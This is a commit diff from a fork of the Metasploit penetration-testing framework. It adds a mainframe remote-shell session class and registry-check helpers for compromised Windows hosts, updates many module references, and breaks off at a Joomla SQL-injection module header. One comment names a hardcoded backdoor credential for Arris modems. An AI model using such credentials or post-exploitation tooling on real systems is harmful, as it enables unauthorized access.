dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Merge branch 'upstream-master' into land-6120-python-stageless

This commit is contained in:
Brent Cook 2015-10-30 17:26:26 -05:00
parent b4a8f80493 cddbcc52ab
commit be23da1c1f
230 changed files with 1395 additions and 429 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

18
Gemfile.lock
View File

@ -1,7 +1,7 @@
PATH
remote: .
specs:
metasploit-framework (4.11.4)
metasploit-framework (4.11.5)
actionpack (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)
bcrypt
@ -21,14 +21,14 @@ PATH
rubyzip (~> 1.1)
sqlite3
tzinfo
metasploit-framework-db (4.11.4)
metasploit-framework-db (4.11.5)
activerecord (>= 4.0.9, < 4.1.0)
metasploit-credential (= 1.0.1)
metasploit-framework (= 4.11.4)
metasploit_data_models (= 1.2.7)
metasploit-framework (= 4.11.5)
metasploit_data_models (= 1.2.9)
pg (>= 0.11)
metasploit-framework-pcap (4.11.4)
metasploit-framework (= 4.11.4)
metasploit-framework-pcap (4.11.5)
metasploit-framework (= 4.11.5)
network_interface (~> 0.0.1)
pcaprub
@ -126,7 +126,7 @@ GEM
activesupport (>= 4.0.9, < 4.1.0)
railties (>= 4.0.9, < 4.1.0)
metasploit-payloads (1.0.15)
metasploit_data_models (1.2.7)
metasploit_data_models (1.2.9)
activerecord (>= 4.0.9, < 4.1.0)
activesupport (>= 4.0.9, < 4.1.0)
arel-helpers
@ -140,7 +140,7 @@ GEM
mime-types (2.6.1)
mini_portile (0.6.2)
minitest (4.7.5)
msgpack (0.6.2)
msgpack (0.7.0)
multi_json (1.11.2)
multi_test (0.1.2)
network_interface (0.0.1)
@ -221,7 +221,7 @@ GEM
actionpack (>= 3.0)
activesupport (>= 3.0)
sprockets (>= 2.8, < 4.0)
sqlite3 (1.3.10)
sqlite3 (1.3.11)
thor (0.19.1)
thread_safe (0.3.5)
tilt (1.4.1)

2
lib/metasploit/framework/version.rb
View File

@ -32,7 +32,7 @@ module Metasploit
MAJOR = 4
MINOR = 11
PATCH = 4
PATCH = 5
PRERELEASE = 'dev'
HASH = get_hash
end

18
lib/msf/base/serializer/readable_text.rb
View File

@ -638,13 +638,10 @@ class ReadableText
# @param col [Integer] the column wrap width.
# @return [String] the formatted list of running jobs.
def self.dump_jobs(framework, verbose = false, indent = DefaultIndent, col = DefaultColumnWrap)
columns = [ 'Id', 'Name' ]
columns = [ 'Id', 'Name', "Payload", "LPORT" ]
if (verbose)
columns << "Payload"
columns << "LPORT"
columns << "URIPATH"
columns << "Start Time"
columns += [ "URIPATH", "Start Time" ]
end
tbl = Rex::Ui::Text::Table.new(
@ -653,16 +650,19 @@ class ReadableText
'Columns' => columns
)
# jobs are stored as a hash with the keys being a numeric job_id.
framework.jobs.keys.sort{|a,b| a.to_i <=> b.to_i }.each { |k|
# Job context is stored as an Array with the 0th element being
# the running module. If that module is an exploit, ctx will also
# contain its payload.
ctx = framework.jobs[k].ctx
row = [ k, framework.jobs[k].name ]
row << (ctx[1].nil? ? (ctx[0].datastore['PAYLOAD'] || "") : ctx[1].refname)
row << (ctx[0].datastore['LPORT'] || "")
if (verbose)
ctx = framework.jobs[k].ctx
uripath = ctx[0].get_resource if ctx[0].respond_to?(:get_resource)
uripath = ctx[0].datastore['URIPATH'] if uripath.nil?
row << (ctx[1].nil? ? (ctx[0].datastore['PAYLOAD'] || "") : ctx[1].refname)
row << (ctx[0].datastore['LPORT'] || "")
row << (uripath || "")
row << (framework.jobs[k].start_time || "")
end

149
lib/msf/base/sessions/mainframe_shell.rb Normal file
View File

@ -0,0 +1,149 @@
# -*- coding: binary -*-
require 'msf/base/sessions/command_shell'
module Msf::Sessions
###
#
# This class provides basic interaction with a Unix Systems Service
# command shell on a mainframe (IBM System Z) running Z/OS
# This session is initialized with a stream that will be used
# as the pipe for reading and writing the command shell.
#
# Date: Oct 8, 2015
# Author: Bigendian Smalls
#
###
class MainframeShell < Msf::Sessions::CommandShell
#
# This interface supports basic interaction.
#
include Msf::Session::Basic
#
# This interface supports interacting with a single command shell.
#
include Msf::Session::Provider::SingleCommandShell
##
#
# initialize as mf shell session
#
def initialize(*args)
self.platform = "mainframe"
self.arch = "zarch"
self.translate_1047 = true
super
end
##
#
# Returns the session description.
#
def desc
"Mainframe shell"
end
##
#
# override shell_read to include decode of cp1047
#
def shell_read(length=-1, timeout=1)
#mfimpl
if self.respond_to?(:ring)
return Rex::Text.from_ibm1047(shell_read_ring(length,timeout))
end
begin
rv = Rex::Text.from_ibm1047(rstream.get_once(length, timeout))
framework.events.on_session_output(self, rv) if rv
return rv
rescue ::Rex::SocketError, ::EOFError, ::IOError, ::Errno::EPIPE => e
shell_close
raise e
end
end
##
#
# override shell_write to include encode of cp1047
#
def shell_write(buf)
#mfimpl
return unless buf
begin
framework.events.on_session_command(self, buf.strip)
rstream.write(Rex::Text.to_ibm1047(buf))
rescue ::Rex::SocketError, ::EOFError, ::IOError, ::Errno::EPIPE => e
shell_close
raise e
end
end
def execute_file(full_path, args)
#mfimpl
raise NotImplementedError
end
# need to do more testing on this before we either use the default in command_shell
# or write a new one. For now we just make it unavailble. This prevents a hang on
# initial session creation. See PR#6067
undef_method :process_autoruns
def desc
"Mainframe USS session"
end
attr_accessor :translate_1047 # tells the session whether or not to translate
# ebcdic (cp1047) <-> ASCII for certain mainframe payloads
# this will be used in post modules to be able to switch on/off the
# translation on file transfers, for instance
protected
##
#
# _interact_ring overridden to include decoding of cp1047 data
#
def _interact_ring
begin
rdr = framework.threads.spawn("RingMonitor", false) do
seq = nil
while self.interacting
# Look for any pending data from the remote ring
nseq,data = ring.read_data(seq)
# Update the sequence number if necessary
seq = nseq || seq
# Write output to the local stream if successful
user_output.print(Rex::Text.from_ibm1047(data)) if data
begin
# Wait for new data to arrive on this session
ring.wait(seq)
rescue EOFError => e
print_error("EOFError: #{e.class}: #{e}")
break
end
end
end
while self.interacting
# Look for any pending input or errors from the local stream
sd = Rex::ThreadSafe.select([ _local_fd ], nil, [_local_fd], 5.0)
# Write input to the ring's input mechanism
shell_write(user_input.gets) if sd
end
ensure
rdr.kill
end
end
end
end

8
lib/msf/core/encoded_payload.rb
View File

@ -342,14 +342,18 @@ class EncodedPayload
self.nop_sled = nop.generate_sled(self.nop_sled_size,
'BadChars' => reqs['BadChars'],
'SaveRegisters' => save_regs)
if nop_sled && nop_sled.length == nop_sled_size
break
else
dlog("#{pinst.refname}: Nop generator #{nop.refname} failed to generate sled for payload", 'core', LEV_1)
end
rescue
dlog("#{pinst.refname}: Nop generator #{nop.refname} failed to generate sled for payload: #{$!}",
'core', LEV_1)
self.nop = nil
end
break
}
if (self.nop_sled == nil)

8
lib/msf/core/exploit.rb
View File

@ -1034,12 +1034,16 @@ class Exploit < Msf::Module
nop_sled = nop.generate_sled(count,
'BadChars' => payload_badchars || '',
'SaveRegisters' => save_regs)
if nop_sled && nop_sled.length == count
break
else
wlog("#{self.refname}: Nop generator #{nop.refname} failed to generate sled for exploit", 'core', LEV_0)
end
rescue
wlog("#{self.refname}: Nop generator #{nop.refname} failed to generate sled for exploit: #{$!}",
'core', LEV_0)
end
break
}
nop_sled

54
lib/msf/core/post/windows/registry.rb
View File

@ -145,6 +145,19 @@ module Registry
end
end
# Checks if a key exists on the target registry
#
# @param key [String] the full path of the key to check
# @return [Boolean] true if the key exists on the target registry, false otherwise
# (also in case of error)
def registry_key_exist?(key)
if session_has_registry_ext
meterpreter_registry_key_exist?(key)
else
shell_registry_key_exist?(key)
end
end
protected
#
@ -310,6 +323,26 @@ protected
shell_registry_cmd_result("add /f \"#{key}\" /v \"#{valname}\" /t \"#{type}\" /d \"#{data}\" /f", view)
end
# Checks if a key exists on the target registry using a shell session
#
# @param key [String] the full path of the key to check
# @return [Boolean] true if the key exists on the target registry, false otherwise,
# even if case of error (invalid arguments) or the session hasn't permission to
# access the key
def shell_registry_key_exist?(key)
begin
key = normalize_key(key)
rescue ArgumentError
return false
end
results = shell_registry_cmd("query \"#{key}\"")
if results =~ /ERROR: /i
return false
else
return true
end
end
##
# Meterpreter-specific registry manipulation methods
@ -515,6 +548,27 @@ protected
end
end
# Checks if a key exists on the target registry using a meterpreter session
#
# @param key [String] the full path of the key to check
# @return [Boolean] true if the key exists on the target registry, false otherwise
# (also in case of error)
def meterpreter_registry_key_exist?(key)
begin
root_key, base_key = session.sys.registry.splitkey(key)
rescue ArgumentError
return false
end
begin
check = session.sys.registry.check_key_exists(root_key, base_key)
rescue Rex::Post::Meterpreter::RequestError, TimesoutError
return false
end
check
end
#
# Normalize the supplied full registry key string so the root key is sane. For
# instance, passing "HKLM\Software\Dog" will return 'HKEY_LOCAL_MACHINE\Software\Dog'

6
lib/msf/core/rpc/v10/rpc_session.rb
View File

@ -481,15 +481,17 @@ private
def _valid_session(sid,type)
s = self.framework.sessions[sid.to_i]
if(not s)
error(500, "Unknown Session ID")
error(500, "Unknown Session ID #{sid}")
end
if type == "ring"
if not s.respond_to?(:ring)
error(500, "Session #{s.type} does not support ring operations")
end
elsif (s.type != type)
elsif (type == 'meterpreter' && s.type != type) ||
(type == 'shell' && s.type == 'meterpreter')
error(500, "Session is not of type " + type)
end
s

16
lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb
View File

@ -77,6 +77,22 @@ class Registry
client, root_key, base_key, perm, response.get_tlv(TLV_TYPE_HKEY).value)
end
# Checks if a key exists on the target registry
#
# @param root_key [String] the root part of the key path. Ex: HKEY_LOCAL_MACHINE
# @param base_key [String] the base part of the key path
# @return [Boolean] true if the key exists on the target registry, false otherwise, even
# it the session hasn't permissions to access the target key.
# @raise [TimeoutError] if the timeout expires when waiting the answer
# @raise [Rex::Post::Meterpreter::RequestError] if the parameters are not valid
def Registry.check_key_exists(root_key, base_key)
request = Packet.create_request('stdapi_registry_check_key_exists')
request.add_tlv(TLV_TYPE_ROOT_KEY, root_key)
request.add_tlv(TLV_TYPE_BASE_KEY, base_key)
response = client.send_request(request)
return response.get_tlv(TLV_TYPE_BOOL).value
end
#
# Opens the supplied registry key on the specified remote host. Requires that the
# current process has credentials to access the target and that the target has the

12
lib/rex/proto/dcerpc/client.rb
View File

@ -57,7 +57,7 @@ require 'rex/proto/smb/exceptions'
case self.handle.protocol
when 'ncacn_ip_tcp'
if self.socket.type? != 'tcp'
raise "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
raise ::Rex::Proto::DCERPC::Exceptions::InvalidSocket, "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
end
when 'ncacn_np'
if self.socket.class == Rex::Proto::SMB::SimpleClient::OpenPipe
@ -65,11 +65,11 @@ require 'rex/proto/smb/exceptions'
elsif self.socket.type? == 'tcp'
self.smb_connect()
else
raise "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
raise ::Rex::Proto::DCERPC::Exceptions::InvalidSocket, "ack, #{self.handle.protocol} requires socket type tcp, not #{self.socket.type?}!"
end
# No support ncacn_ip_udp (is it needed now that its ripped from Vista?)
else
raise "Unsupported protocol : #{self.handle.protocol}"
raise ::Rex::Proto::DCERPC::Exceptions::InvalidSocket, "Unsupported protocol : #{self.handle.protocol}"
end
end
@ -255,7 +255,7 @@ require 'rex/proto/smb/exceptions'
bind, context = Rex::Proto::DCERPC::Packet.make_bind(*self.handle.uuid)
end
raise 'make_bind failed' if !bind
raise ::Rex::Proto::DCERPC::Exceptions::BindError, 'make_bind failed' if !bind
self.write(bind)
raw_response = self.read()
@ -264,11 +264,11 @@ require 'rex/proto/smb/exceptions'
self.last_response = response
if response.type == 12 or response.type == 15
if self.last_response.ack_result[context] == 2
raise "Could not bind to #{self.handle}"
raise ::Rex::Proto::DCERPC::Exceptions::BindError, "Could not bind to #{self.handle}"
end
self.context = context
else
raise "Could not bind to #{self.handle}"
raise ::Rex::Proto::DCERPC::Exceptions::BindError, "Could not bind to #{self.handle}"
end
end

26
lib/rex/proto/dcerpc/exceptions.rb
View File

@ -132,6 +132,32 @@ class NoResponse < Error
end
end
class BindError < Error
def initialize(message=nil)
@message = message
end
def to_s
str = 'Failed to bind.'
if @message
str += " #{@message}"
end
end
end
class InvalidSocket < Error
def initialize(message=nil)
@message = message
end
def to_s
str = 'Invalid Socket.'
if @message
str += " #{@message}"
end
end
end
class InvalidPacket < Error
def initialize(message = nil)
@message = message

2
metasploit-framework-db.gemspec
View File

@ -31,7 +31,7 @@ Gem::Specification.new do |spec|
# Metasploit::Credential database models
spec.add_runtime_dependency 'metasploit-credential', '1.0.1'
# Database models shared between framework and Pro.
spec.add_runtime_dependency 'metasploit_data_models', '1.2.7'
spec.add_runtime_dependency 'metasploit_data_models', '1.2.9'
# depend on metasploit-framewrok as the optional gems are useless with the actual code
spec.add_runtime_dependency 'metasploit-framework', "= #{spec.version}"
# Needed for module caching in Mdm::ModuleDetails

3
modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb
View File

@ -28,9 +28,8 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'BID', '19680' ],
[ 'CVE', '2006-4313' ],
[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20060823-vpn3k.shtml' ],
[ 'OSVDB', '28139' ],
[ 'OSVDB', '28138' ],
[ 'OSVDB', '28138' ]
],
'DisclosureDate' => 'Aug 23 2006'))

1
modules/auxiliary/admin/hp/hp_data_protector_cmd.rb
View File

@ -33,7 +33,6 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2011-0923' ],
[ 'OSVDB', '72526' ],
[ 'ZDI', '11-055' ],
[ 'URL', 'http://c4an-dl.blogspot.com/hp-data-protector-vuln.html' ],
[ 'URL', 'http://hackarandas.com/blog/2011/08/04/hp-data-protector-remote-shell-for-hpux' ]
],
'Author' =>

4
modules/auxiliary/admin/http/arris_motorola_surfboard_backdoor_xss.rb
View File

@ -46,8 +46,8 @@ class Metasploit3 < Msf::Auxiliary
'References' => [
[ 'CVE', '2015-0964' ], # XSS vulnerability
[ 'CVE', '2015-0965' ], # CSRF vulnerability
[ 'CVE', '2015-0966' ], # "techician/yZgO8Bvj" web interface backdoor
[ 'URL', 'https://community.rapid7.com/rapid7_blogpostdetail?id=a111400000AanBs' ] # Original disclosure
[ 'CVE', '2015-0966' ], # "techician/yZgO8Bvj" web interface backdoor
[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2015/06/05/r7-2015-01-csrf-backdoor-and-persistent-xss-on-arris-motorola-cable-modems' ],
]
))

3
modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb
View File

@ -22,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'EDB', '25252' ],
[ 'OSVDB', '93013' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-018' ],
[ 'URL', 'http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-018' ]
],
'Author' => [
'Michael Messner <devnull[at]s3cur1ty.de>'

1
modules/auxiliary/admin/http/linksys_e1500_e2500_exec.rb
View File

@ -26,7 +26,6 @@ class Metasploit3 < Msf::Auxiliary
[ 'OSVDB', '89912' ],
[ 'BID', '57760' ],
[ 'EDB', '24475' ],
[ 'URL', 'http://homesupport.cisco.com/de-eu/support/routers/E1500' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-004' ]
],
'DisclosureDate' => 'Feb 05 2013'))

1
modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb
View File

@ -29,7 +29,6 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://homesupport.cisco.com/en-eu/support/routers/WRT54GL' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-01' ],
[ 'URL', 'http://www.s3cur1ty.de/attacking-linksys-wrt54gl' ],
[ 'EDB', '24202' ],

4
modules/auxiliary/admin/http/manage_engine_dc_create_admin.rb
View File

@ -27,8 +27,8 @@ class Metasploit3 < Msf::Auxiliary
[
['CVE', '2014-7862'],
['OSVDB', '116554'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_dc9_admin.txt'],
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/2']
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/2'],
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_dc9_admin.txt'],
],
'DisclosureDate' => 'Dec 31 2014'))

4
modules/auxiliary/admin/http/manageengine_dir_listing.rb
View File

@ -36,8 +36,8 @@ class Metasploit3 < Msf::Auxiliary
[
['CVE', '2014-7863'],
['OSVDB', '117696'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt'],
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/114']
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/114'],
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt']
],
'DisclosureDate' => 'Jan 28 2015'))

4
modules/auxiliary/admin/http/manageengine_file_download.rb
View File

@ -34,8 +34,8 @@ class Metasploit3 < Msf::Auxiliary
[
['CVE', '2014-7863'],
['OSVDB', '117695'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_failservlet.txt'],
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/114']
['URL', 'http://seclists.org/fulldisclosure/2015/Jan/114'],
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_failservlet.txt']
],
'DisclosureDate' => 'Jan 28 2015'))

4
modules/auxiliary/admin/http/manageengine_pmp_privesc.rb
View File

@ -34,8 +34,8 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2014-8499' ],
[ 'OSVDB', '114485' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_pmp_privesc.txt' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/18' ]
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/18' ],
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_pmp_privesc.txt' ],
],
'DisclosureDate' => 'Nov 8 2014'))

4
modules/auxiliary/admin/http/netflow_file_download.rb
View File

@ -28,8 +28,8 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2014-5445' ],
[ 'OSVDB', '115340' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_netflow_it360_file_dl.txt' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Dec/9' ]
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Dec/9' ],
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/ManageEngine/me_netflow_it360_file_dl.txt' ]
],
'DisclosureDate' => 'Nov 30 2014'))

4
modules/auxiliary/admin/http/nexpose_xxe_file_read.rb
View File

@ -29,9 +29,7 @@ class Metasploit4 < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://community.rapid7.com/community/nexpose/blog/2013/08/16/r7-vuln-2013-07-24' ],
# Fill this in with the direct advisory URL from Infigo
[ 'URL', 'http://www.infigo.hr/in_focus/advisories/' ]
[ 'URL', 'https://community.rapid7.com/community/nexpose/blog/2013/08/16/r7-vuln-2013-07-24' ]
],
'DefaultOptions' => {
'SSL' => true

4
modules/auxiliary/admin/http/sysaid_admin_acct.rb
View File

@ -27,8 +27,8 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'CVE', '2015-2993' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ]
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ],
[ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt' ],
],
'DisclosureDate' => 'Jun 3 2015'))

4
modules/auxiliary/admin/http/sysaid_file_download.rb
View File

@ -34,8 +34,8 @@ class Metasploit3 < Msf::Auxiliary
[
['CVE', '2015-2996'],
['CVE', '2015-2997'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt'],
['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8']
['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8'],
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt'],
],
'DisclosureDate' => 'Jun 3 2015'))

4
modules/auxiliary/admin/http/sysaid_sql_creds.rb
View File

@ -29,8 +29,8 @@ class Metasploit3 < Msf::Auxiliary
[
['CVE', '2015-2996'],
['CVE', '2015-2998'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ],
['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8']
['URL', 'http://seclists.org/fulldisclosure/2015/Jun/8'],
['URL', 'https://github.com/pedrib/PoC/blob/master/advisories/sysaid-14.4-multiple-vulns.txt']
],
'DisclosureDate' => 'Jun 3 2015'))

6
modules/auxiliary/admin/postgres/postgres_readfile.rb
View File

@ -21,11 +21,7 @@ class Metasploit3 < Msf::Auxiliary
as well as read privileges to the target file.
},
'Author' => [ 'todb' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://michaeldaw.org/sql-injection-cheat-sheet#postgres' ]
]
'License' => MSF_LICENSE
))
register_options(

3
modules/auxiliary/admin/smb/psexec_command.rb
View File

@ -99,7 +99,8 @@ class Metasploit3 < Msf::Auxiliary
print_status("#{peer} - Executing the command...")
begin
return psexec(execute)
rescue Rex::Proto::SMB::Exceptions::Error => exec_command_error
rescue Rex::Proto::DCERPC::Exceptions::Error, Rex::Proto::SMB::Exceptions::Error => exec_command_error
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}", 'rex', LEV_3)
print_error("#{peer} - Unable to execute specified command: #{exec_command_error}")
return false
end

3
modules/auxiliary/admin/sunrpc/solaris_kcms_readfile.rb
View File

@ -34,8 +34,7 @@ class Metasploit3 < Msf::Auxiliary
['CVE', '2003-0027'],
['OSVDB', '8201'],
['BID', '6665'],
['URL', 'http://marc.info/?l=bugtraq&m=104326556329850&w=2'],
['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-77-1000898.1-1']
['URL', 'http://marc.info/?l=bugtraq&m=104326556329850&w=2']
],
# Tested OK against sol8.tor 20100624 -jjd
'DisclosureDate' => 'Jan 22 2003')

4
modules/auxiliary/bnat/bnat_router.rb
View File

@ -21,8 +21,8 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://github.com/claudijd/BNAT-Suite'],
[ 'URL', 'http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels'],
[ 'URL', 'https://github.com/claudijd/bnat' ],
[ 'URL', 'http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels']
]
)
register_options(

4
modules/auxiliary/bnat/bnat_scan.rb
View File

@ -25,8 +25,8 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://github.com/claudijd/BNAT-Suite'],
[ 'URL', 'http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels'],
[ 'URL', 'https://github.com/claudijd/bnat'],
[ 'URL', 'http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels']
]
)

1
modules/auxiliary/dos/cisco/ios_http_percentpercent.rb
View File

@ -27,7 +27,6 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'BID', '1154'],
[ 'CVE', '2000-0380'],
[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20000514-ios-http-server.shtml'],
[ 'OSVDB', '1302' ],
],
'DisclosureDate' => 'Apr 26 2000'))

3
modules/auxiliary/dos/dns/bind_tkey.rb
View File

@ -30,8 +30,7 @@ class Metasploit4 < Msf::Auxiliary
'References' => [
['CVE', '2015-5477'],
['URL', 'https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/'],
['URL', 'https://kb.isc.org/article/AA-01272'],
['URL', 'https://github.com/rapid7/metasploit-framework/issues/5790']
['URL', 'https://kb.isc.org/article/AA-01272']
],
'DisclosureDate' => 'Jul 28 2015',
'License' => MSF_LICENSE,

1
modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb
View File

@ -23,7 +23,6 @@ class Metasploit3 < Msf::Auxiliary
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://lists.immunitysec.com/pipermail/dailydave/2006-February/002982.html' ],
[ 'BID', '16838' ],
[ 'OSVDB', '23511' ],
[ 'CVE', '2006-0900' ],

1
modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb
View File

@ -30,7 +30,6 @@ class Metasploit4 < Msf::Auxiliary
'References' =>
[
['CVE', '2014-0050'],
['URL', 'http://markmail.org/message/kpfl7ax4el2owb3o'],
['URL', 'http://tomcat.apache.org/security-8.html'],
['URL', 'http://tomcat.apache.org/security-7.html']
],

3
modules/auxiliary/dos/http/monkey_headers.rb
View File

@ -26,8 +26,7 @@ class Metasploit3 < Msf::Auxiliary
[
['CVE', '2013-3843'],
['OSVDB', '93853'],
['BID', '60333'],
['URL', 'http://bugs.monkey-project.com/ticket/182']
['BID', '60333']
],
'DisclosureDate' => 'May 30 2013'))

3
modules/auxiliary/dos/solaris/lpd/cascade_delete.rb
View File

@ -29,8 +29,7 @@ class Metasploit3 < Msf::Auxiliary
[
[ 'CVE', '2005-4797' ],
[ 'BID', '14510' ],
[ 'OSVDB', '18650' ],
[ 'URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],
[ 'OSVDB', '18650' ]
]
))

2
modules/auxiliary/dos/ssl/openssl_aesni.rb
View File

@ -29,7 +29,7 @@ class Metasploit4 < Msf::Auxiliary
'References' =>
[
[ 'CVE', '2012-2686'],
[ 'URL', 'https://www.openssl.org/news/secadv_20130205.txt']
[ 'URL', 'https://www.openssl.org/news/secadv/20130205.txt' ]
],
'DisclosureDate' => 'Feb 05 2013'))

4
modules/auxiliary/dos/windows/games/kaillera.rb
View File

@ -19,10 +19,6 @@ class Metasploit3 < Msf::Auxiliary
},
'Author' => ["Sil3nt_Dre4m"],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://kaillerahacks.blogspot.com/2011/07/kaillera-server-086-dos-vulnerability.html' ]
],
'DisclosureDate' => 'Jul 2 2011'))
register_options([

3
modules/auxiliary/gather/citrix_published_bruteforce.rb
View File

@ -22,8 +22,7 @@ class Metasploit3 < Msf::Auxiliary
'References' =>
[
[ 'OSVDB', '50617' ],
[ 'BID', '5817' ],
[ 'URL', 'http://sh0dan.org/oldfiles/hackingcitrix.html' ],
[ 'BID', '5817' ]
]
))

3
modules/auxiliary/gather/dns_cache_scraper.rb
View File

@ -23,8 +23,7 @@ class Metasploit3 < Msf::Auxiliary
],
'License' => MSF_LICENSE,
'References' => [
['URL', 'http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html'],
['URL', 'http://www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf']
['URL', 'http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html']
]))
register_options([

1
modules/auxiliary/gather/eventlog_cred_disclosure.rb
View File

@ -34,7 +34,6 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2014-6039' ],
[ 'OSVDB', '114342' ],
[ 'OSVDB', '114344' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_eventlog_info_disc.txt' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Nov/12' ]
],
'DisclosureDate' => 'Nov 5 2014'))

3
modules/auxiliary/gather/huawei_wifi_info.rb
View File

@ -70,8 +70,7 @@ class Metasploit3 < Msf::Auxiliary
[
['CWE', '425'],
['CVE', '2013-6031'],
['US-CERT-VU', '341526'],
['URL', 'http://www.huaweidevice.co.in/Support/Downloads/'],
['US-CERT-VU', '341526']
],
'DisclosureDate' => "Nov 11 2013" ))

1
modules/auxiliary/gather/ie_uxss_injection.rb
View File

@ -32,7 +32,6 @@ class Metasploit3 < Msf::Auxiliary
[ 'CVE', '2015-0072' ],
[ 'OSVDB', '117876' ],
[ 'MSB', 'MS15-018' ],
[ 'URL', 'http://www.deusen.co.uk/items/insider3show.3362009741042107/'],
[ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2015/Feb/10' ]
],

260
modules/auxiliary/gather/joomla_com_realestatemanager_sqli.rb Normal file
View File

@ -0,0 +1,260 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Joomla Real Estate Manager Component Error-Based SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability in Joomla Plugin
com_realestatemanager versions 3.7 in order to either enumerate
usernames and password hashes.
},
'References' =>
[
['EDB', '38445']
],
'Author' =>
[
'Omer Ramic', # discovery
'Nixawk', # metasploit module
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Oct 22 2015'
))
register_options(
[
